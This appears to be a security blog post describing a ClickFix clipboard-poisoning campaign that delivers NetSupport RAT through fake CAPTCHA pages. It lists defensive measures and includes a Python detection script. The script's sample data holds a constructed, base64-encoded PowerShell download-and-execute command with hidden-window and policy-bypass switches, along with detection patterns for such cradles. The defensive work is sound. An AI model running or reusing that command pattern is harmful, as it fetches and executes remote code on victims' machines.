The Clipboard Falls in the (Net)Support Scam
- Javier Conejo del Cerro
- 7 days ago
- 2 min read

What if solving a CAPTCHA meant handing over your system? A new phishing campaign weaponizes trust in everyday platforms by silently injecting malware commands into the clipboard, tricking users into executing them via the Run prompt. The result: full remote access for attackers through a stealthy multi-stage delivery of NetSupport RAT.
The campaign uses fake websites impersonating Gitcode and Docusign—two platforms perceived as safe and widely used. Social engineering does the rest: users are led to these sites through phishing emails or malicious online ads and are asked to prove they’re human by completing a CAPTCHA.
But this CAPTCHA hides a trick. Once solved, the page's script silently writes an obfuscated PowerShell command to the user's clipboard, a technique known as clipboard poisoning (the wider pattern is commonly called ClickFix). The page then instructs the user to open the Windows Run dialog (Win + R), paste the code (Ctrl + V), and press Enter. Nothing runs until the user does so: the browser never executes anything itself, which is why the attack slips past controls that watch for drive-by downloads. With that keystroke, the malware begins its silent journey.
Multi-Stage Infection in the Shadows
Behind the scenes, the attack unfolds in three chained PowerShell scripts. Each stage fetches the next from a remote server, so the final payload never has to appear on the phishing page itself. The stages are:
First Stage: The initial PowerShell script is copied via clipboard and executed by the victim.
Second Stage: This script downloads another PowerShell loader, which checks in with a fake verification page hosted on a domain like docusign.sa[.]com.
Third Stage: The next script retrieves a ZIP file containing jp2launcher.exe, a renamed executable that ultimately installs NetSupport RAT, the abused build of NetSupport Manager, a legitimate remote support product repurposed as a remote access trojan (RAT).
That script also tries to download wbdims.exe from GitHub to establish persistence, ensuring the malware is relaunched every time the user logs in.
Who Falls for It
The victims are mostly non-technical Windows users—individuals who rely on trusted platforms for signing documents, managing projects, or collaborating in development environments. By exploiting visual familiarity and mimicking known brands, the attackers bypass skepticism and security awareness.
The campaign’s sophistication lies not in technical novelty, but in psychological manipulation: trust is hijacked, interfaces are imitated, and basic user actions—solving a CAPTCHA, pasting into Run—are weaponized.
Measures to Fend Off the Trap
To defend against clipboard-based multi-stage attacks like this one, organizations and individuals should implement the following safeguards:
Alert on, or block, powershell.exe launched as a child of explorer.exe (the parent of anything started from the Run dialog) with hidden-window, execution-policy-bypass, encoded-command or download-cradle switches, using endpoint protection that evaluates script behaviour rather than just file hashes. Endpoints cannot see where a pasted command came from, so the process lineage and the command line are the signals to key on.
Flag clipboard changes that occur immediately after CAPTCHA checks or site interaction, especially on domains mimicking known brands.
Restrict PowerShell to users who genuinely need it (AppLocker or WDAC rules, Constrained Language Mode for everyone else) and enable PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the decoded text of every script block, including the contents of -EncodedCommand payloads. For incident response, note that commands typed into Win + R are kept in the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, which is worth pulling from any suspect machine.
Monitor and block traffic to suspicious domains that spoof DevOps tools or document-sharing services (e.g., docusign.sa[.]com).
Train users to never paste or run code copied from the browser into Win + R or a terminal window, especially when prompted by an unfamiliar page; no legitimate CAPTCHA asks for that. Where users have no business need for the Run dialog, it can be removed entirely through Group Policy ("Remove Run menu from Start Menu").
Use browser-based defenses that warn against clipboard manipulation or block access to known phishing infrastructure.
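To make the first and third safeguards above concrete, and to show how the obfuscated stage-one command from the infection chain is unpacked for triage, here is an added example of a small hunting script. It is not code from the original article or from any vendor tool. It assumes Sysmon-style process-creation records with the fields Image, ParentImage and CommandLine, plus a `reg query` dump of the RunMRU key; the sample events, the RunMRU dump and the stage-two URL under the reserved .invalid domain are all constructed here for illustration.

```python
"""Hunt for ClickFix-style clipboard-to-Run-dialog PowerShell launches.

Added example, not code from the article. Inputs are constructed:
Sysmon-style process-creation records (assumed field names Image,
ParentImage, CommandLine) and a `reg query`-style dump of the RunMRU key.
"""
import base64
import binascii
import re

# Substrings typical of a download cradle pulling the next stage.
CRADLE_RE = re.compile(
    r"\b(?:invoke-webrequest|iwr|invoke-expression|iex|curl|wget|"
    r"downloadstring|downloadfile|net\.webclient)\b|https?://", re.I)
# Switches used to hide the console or sidestep execution policy.
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-e(?:p|xecutionpolicy)\s+bypass", re.I)
ALERT_THRESHOLD = 5


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext behind -e/-ec/-enc/-EncodedCommand, or ''.

    PowerShell takes base64 of UTF-16LE text. Other prefixes the shell
    accepts (-en, -enco, ...) are deliberately not handled, to keep the
    pattern readable; extend the alternation if you need them."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one process-creation record; higher means more ClickFix-like."""
    if not ev.get("Image", "").lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, []
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + " " + decoded            # scan the visible and the decoded command
    score, reasons = 0, []
    if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        score += 3                          # Run dialog and Start menu launches look like this
        reasons.append("parent is explorer.exe (Run dialog / shell launch)")
    if decoded:
        score += 1
        reasons.append("encoded command: " + decoded[:60])
    flags = sorted({f.lower() for f in EVASION_RE.findall(text)})
    if flags:
        score += 2
        reasons.append("evasion flags: " + ", ".join(flags))
    cradle = sorted({t.lower() for t in CRADLE_RE.findall(text)})
    if cradle:
        score += 3
        reasons.append("download cradle: " + ", ".join(cradle))
    return score, reasons


def hunt(events: list[dict]) -> list[dict]:
    """Return the events at or above ALERT_THRESHOLD, with reasons attached."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            hits.append({**ev, "Score": score, "Reasons": reasons})
    return hits


RUNMRU_LINE = re.compile(r"^\s*(\w+)\s+REG_SZ\s+(.*?)\s*$")


def runmru_entries(reg_dump: str) -> list[str]:
    """Commands typed into Win+R, from a `reg query ...\\RunMRU` dump.
    Each value carries a trailing '\\1'; MRUList only records ordering."""
    out = []
    for line in reg_dump.splitlines():
        m = RUNMRU_LINE.match(line)
        if m and m.group(1) != "MRUList":
            out.append(m.group(2).removesuffix("\\1"))
    return out


def suspicious_runmru(reg_dump: str) -> list[str]:
    """RunMRU commands that score as ClickFix-like. Only entries that start
    with powershell/pwsh are scored, treated as explorer.exe children."""
    flagged = []
    for cmd in runmru_entries(reg_dump):
        first = cmd.split()[0].lower() if cmd.split() else ""
        if first not in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
            continue
        ev = {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": cmd}
        if score_event(ev)[0] >= ALERT_THRESHOLD:
            flagged.append(cmd)
    return flagged


# Constructed stage-1 command modelled on the article's description: hidden
# window, policy bypass, encoded cradle fetching the next stage. The URL is a
# placeholder under the reserved .invalid TLD, not an indicator from the page.
_STAGE1 = "iwr https://example.invalid/stage2 -UseBasicParsing | iex"
_ENC = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed, Sysmon Event ID 1 style
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": f"powershell -w hidden -ep bypass -enc {_ENC}"},
    # Scheduled-task script: one quiet flag, but no explorer parent and no cradle.
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
    # User opening a console from the Start menu: explorer parent alone.
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe"},
]

SAMPLE_RUNMRU = f"""
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
    a    REG_SZ    notepad\\1
    b    REG_SZ    powershell -w hidden -ep bypass -enc {_ENC}\\1
    MRUList    REG_SZ    ba
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["Score"], hit["Reasons"])
    print("RunMRU:", suspicious_runmru(SAMPLE_RUNMRU))
```

On the constructed input only the first event fires: explorer.exe parent, decoded payload, two evasion switches and a download cradle add up well past the threshold, while the scheduled task (flags only) and the manually opened console (explorer parent only) stay below it. The same scorer applied to the RunMRU dump flags the pasted command and ignores the innocent notepad entry. To run this against real data, feed it Sysmon Event ID 1 or Security 4688 records with the same three fields, and tune the weights and threshold to your own baseline of explorer.exe-launched PowerShell.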
The NetSupport RAT is not new—but the way it’s delivered here is creative, evasive, and deeply reliant on human error. Security isn’t just about stopping code; it’s about understanding trust, interaction, and the subtle ways both can be turned against us.